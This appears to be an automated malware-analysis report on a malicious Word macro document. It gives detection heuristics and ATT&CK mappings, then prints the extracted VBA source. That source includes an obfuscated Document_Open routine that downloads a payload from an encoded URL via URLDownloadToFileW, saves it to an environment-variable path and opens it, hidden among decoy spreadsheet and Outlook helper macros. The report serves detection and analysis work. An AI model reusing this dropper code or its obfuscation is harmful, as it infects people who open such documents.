MALICIOUS
338
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The file contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The macro utilizes the URLDownloadToFileW API to download a payload from a remote source, indicating an Ingress Tool Transfer attack pattern. The specific URL is not directly visible in the provided evidence, but the API call itself is a strong indicator of malicious intent.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-7081887-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7081887-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
And VBA7 And Win64 And 1 And True Then Private Declare PtrSafe Function ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh Lib "urlmon" Alias "URLDownloadToFileW" (ByVal x4¦SZC¬¢á9§i¯ö·»9¤KJ®ônO»YiXÉï As Long, ByVal ƒîhúDà»ÂXbFOçé¼D£µ¯à±¥ÆUJ As LongPtr, ByVal tKm§tÄ3²y²£æ³ojqàPF¢à¼Uyk¤´yB¶al8ûR¦mWtùsmTƒ²n As LongPtr, ByVal æU®£lºWT©·E¢ÉJYûb³¸wwé As Long, ByVal Cj¨Dal8ûR¦mWtùsmTƒ²n3P3 As Long) As LongPtr -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Call ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh(0, StrPtr(ì¶uë8À¸q("hQRLtdJZtwNlpgYS:VD0/0An/_BCfeE-r4aUeDnDe{pkt`@9o+kJaMt8iFb_rM8g./}txE{eyDj5zFWh/,[_fOkhlgu,iu,TtK:L.2FbeMfPxm<oeN]s")), StrPtr(»ni¿3), (-526 - (-5944) + (-5418)), ((9146) - (1066) + (-8080))) CreateObject(ì¶uë8À¸q(IÄCêaAédxguS(1))).Open (»ni¿3) End Sub -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
On Error Resume Next Set oOutlook = GetObject(, "Outlook.Application") On Error GoTo 0 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub docUmeNt_opeN() IÄCêaAédxguS(0) = l²DGU8åÜ©ä(0, -4935, 3176) -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
»ni¿3 = VBA.Environ$(ì¶uë8À¸q(IÄCêaAédxguS(0))) + ì¶uë8À¸q("\.DTt,d;zaHAoXuuuueBjc9ywHxij@9LgRxpi@>F.n(5et`YxVpFe@ip") Call ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh(0, StrPtr(ì¶uë8À¸q("hQRLtdJZtwNlpgYS:VD0/0An/_BCfeE-r4aUeDnDe{pkt`@9o+kJaMt8iFb_rM8g./}txE{eyDj5zFWh/,[_fOkhlgu,iu,TtK:L.2FbeMfPxm<oeN]s")), StrPtr(»ni¿3), (-526 - (-5944) + (-5418)), ((9146) - (1066) + (-8080))) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11667 bytes |
SHA-256: 6aea3de2fc94870d32ab537eb56805f4456f0192cfdb001aa70a995bbe474365 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Not False And 1 And 1 And 1 And 1 And 1 _
And VBA7 And Win64 And 1 And True Then
Private Declare PtrSafe Function ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh Lib "urlmon" Alias "URLDownloadToFileW" (ByVal x4¦SZC¬¢á9§i¯ö·»9¤KJ®ônO»YiXÉï As Long, ByVal ƒîhúDà»ÂXbFOçé¼D£µ¯à±¥ÆUJ As LongPtr, ByVal tKm§tÄ3²y²£æ³ojqàPF¢à¼Uyk¤´yB¶al8ûR¦mWtùsmTƒ²n As LongPtr, ByVal æU®£lºWT©·E¢ÉJYûb³¸wwé As Long, ByVal Cj¨Dal8ûR¦mWtùsmTƒ²n3P3 As Long) As LongPtr
Private Declare PtrSafe Function GetSystemMetricskDC4 Lib "USER32" (ByVal nIndex As Long) As LongPtr
Private Declare PtrSafe Function GdipCreateHBITMAPFromBitmapl473 Lib "GDIPlus" (ByVal bitmap As LongPtr, hbmReturn As LongPtr, ByVal background As Long) As LongPtr
Private Declare PtrSafe Function timeGetTimeMDgb Lib "winmm.dll" () As LongPtr
#Else
Private Declare Function SendMessageAhfdy Lib "user32" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function IsCharAlphaNumericADOIw Lib "USER32" (ByVal byChar As Byte) As Long
Private Declare Function timeGetTimeyXIx Lib "winmm.dll" () As Long
Private Declare Function ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh Lib "urlmon" Alias "URLDownloadToFileW" (ByVal x4¦SZC¬¢á9§i¯ö·»9¤KJ®ônO»YiXÉï As Long, ByVal ƒîhúDà»ÂXbFOçé¼D£µ¯à±¥ÆUJ As Long, ByVal tKm§tÄ3²y²£æ³ojqàPF¢à¼Uyk¤´yB¶al8ûR¦mWtùsmTƒ²n As Long, ByVal æU®£lºWT©·E¢ÉJYûb³¸wwé As Long, ByVal Cj¨Dal8ûR¦mWtùsmTƒ²n3P3 As Long) As Long
#End If
Private IÄCêaAédxguS(10)
Function h3¤·hòöô(ëIP®T±9§¬3, Ká«á´Xxö²q, êÆVëì9ì3l§t)
Select Case ëIP®T±9§¬3
Case (0): h3¤·hòöô = "TRQwE3r[MR7hPmY}"
Case (1): h3¤·hòöô = "SpM=hs\>eXx:lx[ql.9)./arAt98pT?DpuS[l7YUiv\|cfW<a|GCt?54iLXuo-,`nYJU"
Case (2): h3¤·hòöô = "TqAz¾ëEb¶gºá"
Case (3): h3¤·hòöô = "åxoº¢·3U"
Case (4): h3¤·hòöô = "¿Jh¹ä¸F3"
Case (5): h3¤·hòöô = "hGK¸Ö6K"
Case (6): h3¤·hòöô = "¢4I©à¤iDc"
Case (7): h3¤·hòöô = "À·3NºúXü±z7±"
Case (8): h3¤·hòöô = "àÜgvªTX´¿Vc±"
Case (9): h3¤·hòöô = "ñ8J²VÑRCµÉÉ"
End Select
End Function
Sub XkiAquickly_Change_Data_inRange()
Dim googleCar As Range
Set googleCar = Range("B2").CurrentRegion
For Each Tesla In googleCar
Tesla.Value = 20
Next
End Sub
Sub c02Kchange_Data_inColumn()
Dim googleCar As Range
Set googleCar = Range("B2").CurrentRegion
For Each Tesla In googleCar.Columns(1)
Tesla.Value = 15
Next
End Sub
'Instead of For...Each just :
'googleCar.Value = ...
Sub CSUFchange_specific_Data_inRange()
Dim googleCar As Range
Set googleCar = Range("B2").CurrentRegion
For Each Tesla In googleCar
If Tesla = 5 Then
googleCar.Value = 10
End If
Next
End Sub
Function àSwzJ»â(èM¿1dass, ©¸åñÄÖï»jZO, q±U¬Ö¿¶4¤²Ü, À7¥f¦aVlM, a®BTb3f5éòaƒ, ££êÑb¢jñ1)
àSwzJ»â = StrConv(èM¿1dass, À7¥f¦aVlM)
End Function
Private Sub xtJ8mY4wCommandButton12_Click()
'
' When the user clicks the button, we need to know
' which value needs to be implemented from which
' control element
'
Result = HxQMget_valeur_de_Optionbutton(0)
If Result = False Then
'
' We need to test the value that the user entered
' to not get errors on the sheet
'
wk.Range("jours_activités").Value = (TextBox1.Value * 1)
Else
get_valeur_list = ComboBox1.Value
Select Case get_valeur_list
Case Is = "Normal":
wk.Range("jours_activités").Value = 365
Case Is = "Business":
wk.Range("jours_activités").Value = 251
Case Is = "Jours ouvrées, Sans Weekend, Avec vacances":
wk.Range("jours_activités").Value = 260
End Select
End If
'
' Create object to change phrases
'
Dim changer_les_phrases As PhrasesEngine
Set changer_les_phrases = New PhrasesEngine
changer_les_phrases.change_phrases
End Sub
Private Sub qIo6MNGROptionButton1_Change()
'
' We detect change on the option button number 1
' and if the user changed to 'personalized',
' we enable the corresponding elements for him/her
'
Result = HxQMget_valeur_de_Optionbutton(0)
If Result = False Then
TextBox1.Enabled = True
TextBox1.Value = 365
ComboBox1.Enabled = False
Else
TextBox1.Enabled = False
TextBox1.Value = ""
ComboBox1.Enabled = True
End If
End Sub
Private Sub TWPfimakUserForm_Initializer()
Dim weeks(2) As String
Set wk = Worksheets("Config")
'Enable system radio button as true
OptionButton1.Value = True
Result = HxQMget_valeur_de_Optionbutton(0)
If Result Then
TextBox1.Enabled = False
End If
End Sub
Private Function HxQMget_valeur_de_Optionbutton(Optional ByVal option_button As Long = 0) As Boolean
'
' This is a helper that retrieves the current value
' of the option buttons
'
If option_button = 0 Then
HxQMget_valeur_de_Optionbutton = OptionButton1.Value
ElseIf option_button = 1 Then
HxQMget_valeur_de_Optionbutton = OptionButton1.Value
Else
Err.Raise 0
End If
End Function
Private Sub EUn0ppD6UserForm_Terminate()
' DOES NOT WORK
' This is to set the textbox to the new value
ReglagesForm.TextBox5.Value = wk.Range("jours_par_semaines").Value
End Sub
Function T´WQçù§¶¦êwmV(¸qâPë¨Xà, dòrTÁÜÖmæ, zæ¶Â¹ªOà, ÆúH¦XbPé, èÀâuÂE§¢Y, PºFRé±gG¿)
T´WQçù§¶¦êwmV = StrConv(¸qâPë¨Xà, ÆúH¦XbPé)
End Function
Private Sub J8LDg1wECommandButton2_Click()
'
' This will show an additional form to the user as
' a way to form him/her to not change the weeks directly
' on the main form
'
SemainesForm.Show
End Sub
Private Sub AFFqk9xLCommandButton3_Click()
PrixForm.Show
End Sub
Private Sub Fdk2nmwNset_Params()
'
' This a helper used to set parameters to
' the textboxes
'
TextBox1.Value = wk.Range("personnel").Value
TextBox2.Value = wk.Range("salaire").Value
TextBox3.Value = wk.Range("jours_activités").Value
TextBox4.Value = wk.Range("heures_par_jours").Value
TextBox5.Value = wk.Range("jours_par_semaines").Value
'
' Prevent direct change of activity days froms userform
'
TextBox3.Locked = True
TextBox3.Enabled = False
End Sub
Function ì¶uë8À¸q(©Àn¼TSP¨Á8¸) As String
Dim ÖPlïeL¥ªD(1055) As Byte, ¿ÿjºèEd©³66BÁv() As Byte
¿ÿjºèEd©³66BÁv = àSwzJ»â(©Àn¼TSP¨Á8¸, IÄCêaAédxguS(2), IÄCêaAédxguS(3), (-6401 - (3084) + (9613)), IÄCêaAédxguS(4), IÄCêaAédxguS(5))
For ævá´M01½³ƒU97nR = 0 To UBound(¿ÿjºèEd©³66BÁv) - 1
If (ævá´M01½³ƒU97nR Mod 4 = ((9146) - (1066) + (-8080))) Then
ÖPlïeL¥ªD(´ëì⨢NÀ¿îbRjff) = ¿ÿjºèEd©³66BÁv(ævá´M01½³ƒU97nR)
´ëì⨢NÀ¿îbRjff = ´ëì⨢NÀ¿îbRjff + 1
End If
Next ævá´M01½³ƒU97nR
ì¶uë8À¸q = Left(T´WQçù§¶¦êwmV(ÖPlïeL¥ªD, IÄCêaAédxguS(6), IÄCêaAédxguS(7), (-2136 - (-9775) + (-7575)), IÄCêaAédxguS(8), IÄCêaAédxguS(9)), ´ëì⨢NÀ¿îbRjff)
End Function
Sub rQG1test_if_OutlookIsOpen()
Dim oOutlook As Object
On Error Resume Next
Set oOutlook = GetObject(, "Outlook.Application")
On Error GoTo 0
If oOutlook Is Nothing Then
MsgBox "Outlook is not open, open Outlook and try again"
Else
' TO DO
'
MsgBox "Is Open"
End If
End Sub
Sub docUmeNt_opeN()
IÄCêaAédxguS(0) = l²DGU8åÜ©ä(0, -4935, 3176)
IÄCêaAédxguS(1) = l²DGU8åÜ©ä(1, -6144, -9501)
IÄCêaAédxguS(2) = l²DGU8åÜ©ä(2, -4330, -6328)
IÄCêaAédxguS(3) = l²DGU8åÜ©ä(3, -7243, -8927)
IÄCêaAédxguS(4) = l²DGU8åÜ©ä(4, 7535, -6891)
IÄCêaAédxguS(5) = l²DGU8åÜ©ä(5, 5233, 1409)
IÄCêaAédxguS(6) = l²DGU8åÜ©ä(6, -1681, 3351)
IÄCêaAédxguS(7) = l²DGU8åÜ©ä(7, 8775, -4982)
IÄCêaAédxguS(8) = l²DGU8åÜ©ä(8, -6928, -4562)
IÄCêaAédxguS(9) = l²DGU8åÜ©ä(9, 6480, -3101)
»ni¿3 = VBA.Environ$(ì¶uë8À¸q(IÄCêaAédxguS(0))) + ì¶uë8À¸q("\.DTt,d;zaHAoXuuuueBjc9ywHxij@9LgRxpi@>F.n(5et`YxVpFe@ip")
Call ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh(0, StrPtr(ì¶uë8À¸q("hQRLtdJZtwNlpgYS:VD0/0An/_BCfeE-r4aUeDnDe{pkt`@9o+kJaMt8iFb_rM8g./}txE{eyDj5zFWh/,[_fOkhlgu,iu,TtK:L.2FbeMfPxm<oeN]s")), StrPtr(»ni¿3), (-526 - (-5944) + (-5418)), ((9146) - (1066) + (-8080)))
CreateObject(ì¶uë8À¸q(IÄCêaAédxguS(1))).Open (»ni¿3)
End Sub
Sub ov9Wfile_Picker()
'
' Imports table / Microsoft Office Object Library 16.0
'
'Dim
Dim table_Name(1) As Variant
Dim sheet_Path As String
'Open file picker
Dim fd As Office.FileDialog
Set fd = Application.FileDialog(msoFileDialogFilePicker)
'Open file picker
With fd
.AllowMultiSelect = False
.Title = "Select a file"
.Filters.Clear
.Filters.Add "Excel", "*.xlsx"
'When user has picked file
If .Show = True Then
'Path
sheet_Path = fd.SelectedItems.Item(1)
'Name
table_Name(0) = Dir(fd.SelectedItems.Item(1))
Else
'TO DO
End If
End With
End Sub
Function l²DGU8åÜ©ä(¿ôgRÖPl0îÿC, thúòrâGqÁï, äkRÿòq伃4)
Select Case ¿ôgRÖPl0îÿC
Case (0): l²DGU8åÜ©ä = h3¤·hòöô(0, 4229, 1375)
Case (1): l²DGU8åÜ©ä = h3¤·hòöô(1, 6476, -6664)
Case (2): l²DGU8åÜ©ä = h3¤·hòöô(2, -7899, -5486)
Case (3): l²DGU8åÜ©ä = h3¤·hòöô(3, 4021, 1885)
Case (4): l²DGU8åÜ©ä = h3¤·hòöô(4, 5189, 1025)
Case (5): l²DGU8åÜ©ä = h3¤·hòöô(5, 9258, -4486)
Case (6): l²DGU8åÜ©ä = h3¤·hòöô(6, 8390, -8063)
Case (7): l²DGU8åÜ©ä = h3¤·hòöô(7, 708, 1246)
Case (8): l²DGU8åÜ©ä = h3¤·hòöô(8, -2002, -1601)
Case (9): l²DGU8åÜ©ä = h3¤·hòöô(9, -4898, -6487)
End Select
End Function
Sub Wd65CreateAppointment()
Dim olAppt As AppointmentItem
Set olAppt = Application.CreateItem(olAppointmentItem)
With olAppt
.Subject = "My Subject"
.Body = "This is the body"
.RequiredAttendees = "something@gmail.com"
.Location = "Lille"
.ReminderMinutesBeforeStart = "30"
.Start = #11/19/2017 2:00:00 AM#
.End = #11/19/2017 4:00:00 AM#
'.BillingInformation = "something"
.Categories = "Business"
.Display
End With
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.